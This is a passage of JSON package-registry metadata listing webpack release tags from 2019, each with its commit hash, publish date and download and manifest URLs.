oad.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":